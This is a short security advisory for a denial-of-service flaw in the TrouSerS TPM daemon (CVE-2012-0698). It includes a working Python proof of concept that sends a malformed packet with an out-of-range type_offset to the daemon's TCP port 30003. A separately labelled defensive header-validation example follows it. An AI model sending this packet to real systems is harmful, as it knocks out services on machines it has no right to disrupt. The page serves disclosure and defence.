TrouSerS Denial Of Service Exploit

Summary

TrouSerS suffers from a denial of service vulnerability.

Credit:

The information has been provided by Andy Lutomirski.


Details

Vulnerable Systems:
 * TrouSerS

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack('>IIIIIII',
    28,          # packet_size = sizeof(tcsd_packet_hdr)
    11,          # ordinal: LoadKeyByBlob
    1,           # num_parms = 1 (so first getData doesn't bail)
    0,           # type_size = 0
    0x80000000,  # type_offset is off in lala land
    0,           # parm_size = 0 (skip checking)
    28,          # parm_offset: see getTCSDPacket
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()
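
The header checks whose absence the packet above relies on, written as an added example for defenders; it is not part of the original advisory and is not the TrouSerS code or its fix. The field order is taken from the comments in the proof of concept, and the function name, the "one type byte per parameter" rule and the well-formed sample packet are assumptions of this example.

```python
import struct

# Seven big-endian 32-bit fields, in the order given by the PoC's comments.
HDR = struct.Struct(">IIIIIII")
FIELDS = ("packet_size", "ordinal", "num_parms", "type_size",
          "type_offset", "parm_size", "parm_offset")


def check_tcsd_header(packet):
    """Return a list of problems in the packet header (empty list = passes)."""
    if len(packet) < HDR.size:
        return ["short packet: %d of %d header bytes" % (len(packet), HDR.size)]
    h = dict(zip(FIELDS, HDR.unpack_from(packet)))
    problems = []
    size = len(packet)
    if h["packet_size"] != size:
        problems.append("packet_size %d != %d bytes received"
                        % (h["packet_size"], size))
    # Each (offset, size) pair must describe a region after the header and
    # inside the bytes that actually arrived.
    for name in ("type", "parm"):
        off, length = h[name + "_offset"], h[name + "_size"]
        if off < HDR.size or off > size or length > size - off:
            problems.append("%s region [%d, +%d) outside %d-byte packet"
                            % (name, off, length, size))
    # Assumption of this example: one type byte per parameter.
    if h["num_parms"] > h["type_size"]:
        problems.append("num_parms %d exceeds type_size %d"
                        % (h["num_parms"], h["type_size"]))
    return problems


# Header values from the proof of concept on this page.
MALFORMED = HDR.pack(28, 11, 1, 0, 0x80000000, 0, 28)
# Constructed well-formed sample: one type byte at 28, four data bytes at 29.
WELL_FORMED = HDR.pack(33, 11, 1, 1, 28, 4, 29) + b"\x00" * 5

if __name__ == "__main__":
    for label, pkt in (("malformed", MALFORMED), ("well-formed", WELL_FORMED)):
        print(label, check_tcsd_header(pkt) or "ok")
```

The same bounds logic applies wherever an offset read from the wire is used to index a receive buffer: compare it against the number of bytes actually received before dereferencing.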

CVE Information:
CVE: 2012-0698

Disclosure Timeline:
Published: 2012-11-23

Categories: Exploits